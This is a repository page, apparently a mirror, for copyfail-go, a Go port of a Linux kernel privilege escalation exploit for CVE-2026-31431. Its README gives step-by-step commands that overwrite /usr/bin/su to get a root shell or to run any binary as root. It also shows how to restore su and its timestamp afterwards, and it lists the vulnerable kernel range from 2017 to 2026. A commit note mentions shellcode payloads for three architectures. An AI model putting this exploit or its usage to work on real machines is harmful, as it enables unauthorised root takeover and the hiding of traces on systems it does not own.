milliways-infosec/copyfail-go
5
0
Fork 0
mirror of https://github.com/badsectorlabs/copyfail-go.git synced 2026-05-16 06:30:10 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
A Go implementation of copyfail (CVE-2026-31431)
4 commits 1 branch 3 tags 49 KiB
Find a file
kernel-sanders 131f7d1842 feat: allow binary exec and improve documentation 
- Added new shellcode payloads for exec-argv1 and exec-bin-sh for amd64, i386, and aarch64 architectures.
- Introduced a backup feature for the su binary before overwriting it.
- Enhanced README.md with usage instructions and details about affected kernels.
- Added build-n-print.sh script for building and printing payloads in hex format.
2026-04-30 01:33:04 -04:00
.github/workflows feat: initial commit 2026-04-29 18:53:12 -04:00
payloads feat: allow binary exec and improve documentation 2026-04-30 01:33:04 -04:00
.gitignore feat: allow binary exec and improve documentation 2026-04-30 01:33:04 -04:00
.goreleaser.yaml feat: allow binary exec and improve documentation 2026-04-30 01:33:04 -04:00
go.mod feat: initial commit 2026-04-29 18:53:12 -04:00
go.sum feat: initial commit 2026-04-29 18:53:12 -04:00
LICENSE feat: initial commit 2026-04-29 18:53:12 -04:00
main.go feat: allow binary exec and improve documentation 2026-04-30 01:33:04 -04:00
README.md feat: allow binary exec and improve documentation 2026-04-30 01:33:04 -04:00

README.md

CopyFail Go

Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script static Go binary roots every Linux distribution shipped since 2017.

A Go implementation of CVE-2026-31431. In case you need a static binary and no Python dependency.

See copy.fail for more info.

Interactive shell

# Get the binary to your Linux host with code execution (exercise for the reader)
user@host$ chmod +x copyfail-go
user@host$ ./copyfail-go --backup /tmp/su
root@host# cat /tmp/su > /usr/bin/su    # Restore the original su binary
root@host# touch -r /tmp/su /usr/bin/su # Restore the modified time of the original su
root@host# rm /tmp/su
root@host# # Do things as root =)

Run binary as root

Useful to elevate a program to root

# Get the binary to your Linux host with code execution (exercise for the reader)
user@host$ chmod +x copyfail-go
user@host$ ./copyfail-go --backup /tmp/su --exec ./your-binary
user@host$ # Use whatever you ran to restore su from /tmp/su

Affected kernels (from copy-fail-c)

floor:    torvalds/linux 72548b093ee3   August 2017, v4.14
                                        (AF_ALG iov_iter rework that
                                         introduced the file-page write
                                         primitive via splice into the AEAD
                                         scatterlist)

ceiling:  torvalds/linux a664bf3d603d   April 2026, mainline
                                        (reverts the 2017 algif_aead
                                         in-place optimization; separates
                                         source and destination scatterlists
                                         so page-cache pages can no longer
                                         be a writable crypto destination)

In between: every major distro kernel that didn't backport the fix. Ubuntu, RHEL, SUSE, Amazon Linux, and Debian were all confirmed vulnerable in their stock cloud-image kernels at disclosure time. Distro-level backports started rolling out around 2026-04-29 alongside the public disclosure. To verify whether a target kernel is in-window, check whether a664bf3d603d (or its distro-specific backport) is present in the kernel's git log or the distro's changelog.